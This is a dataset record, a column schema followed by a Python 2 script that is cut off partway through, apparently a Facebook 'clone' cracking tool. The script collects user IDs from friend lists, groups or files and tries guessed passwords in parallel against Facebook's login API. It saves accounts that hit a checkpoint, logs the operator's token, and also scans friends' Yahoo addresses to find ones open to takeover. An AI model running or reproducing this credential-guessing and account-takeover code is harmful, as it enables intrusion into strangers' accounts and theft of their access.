blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
โ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5199d29b7a9766ad46f93f5207fb801319b2a68f | 1676ac24240138302dfe0ce03d00478dde138491 | /aahil.py | 6180fe1b1260548f0dd9037e52c751f56f7c5a3a | [] | no_license | Blacktiger786/mr | fc550246d06ecd54204433f85ec66b37142d2e60 | 3b8d227ab7761f47e8bdca3831602a74569e5909 | refs/heads/master | 2022-04-20T20:35:32.752537 | 2020-04-18T06:31:28 | 2020-04-18T06:31:28 | 256,677,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,886 | py | ๏ปฟ#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
#### LOGO ####
logo = """
\033[1;91m _ ____
\033[1;91m | | |___ \
\033[1;92m ___| | ___ _ __ __) |_ __ Updated โญโก
\033[1;92m / __| |/ _ \| '_ \ |__ <| '__|
\033[1;93m | (__| | (_) | | | |___) | |
\033[1;93m \___|_|\___/|_| |_|____/|_|
\033[1;93m๐ฅโญโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโฎ๐ฅ
\033[0;94m โก โฏ ๐ฎ๐๐๐๐๐๐ โช ๐ธ๐.๐ฝ๐๐๐ ๐ฌ๐๐๐๐ โฌโก
\033[0;94m โก โฏ ๐๐๐๐๐๐๐ โช Aahil Creations โฌโก
\033[0;93m โก โฏ ๐ด๐ ๐รธ๐ ๐๐๐๐๐๐๐๐๐๐๐ ๐๐๐ ๐๐๐ ๐๐๐๐ ๐๐๐ โฌโก
\033[1;93m๐ฅโฐโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโฏ๐ฅ """
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;97m _ _ _
\033[1;97m /\ | | (_)| | VIRSON 0.2โก
\033[1;97m / \ __ _ | |__ _ | |
\033[1;97m / /\ \ / _` || '_ \ | || |
\033[1;97m / ____ \| (_| || | | || || |
\033[1;97m /_/ \_\\__,_||_| |_||_||_|"""
jalan("\033[1;96mโขโโขโโโโโโโโโโโโโขโโข\033[1;99mAahil\033[1;99mโขโโขโโโโโโโโโโโโโขโโข")
jalan("\033[1;96m ___ _ __ __ _ ___ ___ ")
jalan("\033[1;96m / _/| | /__\ | \| || __|| _ \ CLONE ALL COUNTRY")
jalan("\033[1;96m| \__| |_| \/ || | ' || _| | v / ")
jalan("\033[1;96m \__/|___|\__/ |_|\__||___||_|_\ ")
jalan("\033[1;97m INDIAN USER USE ANY PROXY TO CLONE")
jalan("\033[1;97m WIFI USER USE ANY PROXY TO CLONE")
jalan("\033[1;93m Welcome to Aahil Creations")
jalan("\033[1;96mโขโโขโโโโโโโโโโโขโโข\033[1;96mBlacktiger\033[1;96mโขโโขโโโโโโโโโโโขโโข")
CorrectUsername = "rana"
CorrectPassword = "rana"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m๐ \x1b[1;96mENTER Username \x1b[1;97mยปยป \x1b[1;97m")
if (username == CorrectUsername):
password = raw_input("\033[1;97m๐ \x1b[1;96mENTER Password \x1b[1;97mยปยป \x1b[1;97m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:love_hacker
time.sleep(2)
loop = 'false'
else:
print "\033[1;96mWrong Password"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "\033[1;96mWrong Username"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[โก] \x1b[1;93mLogin your new id \x1b[1;93m[โก]' )
id = raw_input('\033[1;963m[+] \x1b[0;34mEnter ID/Email \x1b[1;93m: \x1b[1;93m')
pwd = raw_input('\033[1;93m[+] \x1b[0;34mEnter Password \x1b[1;93m: \x1b[1;93m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[โ] \x1b[1;92mLogin Hogai'
os.system('xdg-open https://facebook.com/bhupinder.india2')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mAisa lagta hai apka account checkpoint pe hai")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email ghalat hai")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mAisa lagta hai apka account checkpoint pe hai"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97mโ\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97mโ\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;36m Hack Fb MBF"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;36m Group ki list dekho "
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;36m Yahoo clone "
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
yahoo()
elif unikers =="0":
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;36m Apni id ki friend list hack"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;36m Apny dost ki friend list hack"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;36m Apny facebook group ko hack kro"
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;36m list bana k hack kro"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[โบ] \033[1;93mBahir lejao ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;37mFriend ka ID code enter krein \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[โบ] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id="+idg+"&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[โบ] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/"+idg+"/members?fields=name,id&limit=9999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[โบ] \033[1;93mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97mโธ\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['last_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = ('indian')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = ('indian123')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = ('india123')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass8 = ('bhagwan')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass8
oks.append(user+pass8)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass8
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass8+"\n")
cek.close()
cekpoint.append(user+pass8)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken tidak ditemukan"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;96m[\033[1;92mGroup\033[1;96m]\x1b[1;97m "+str(id)+" \x1b[1;96m=>\x1b[1;97m "+str(nama)
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[โ] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Clone dari teman"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Clone dari member group"
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;93m Clone dari file"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97mโบ\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;96m[\x1b[1;97mโบ\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;92mVULNโ\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[โบ] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/TemanMailVuln.txt','w')
jalan('\033[1;96m[โบ] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;92mVULNโ\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[โบ] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;96m[โบ] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
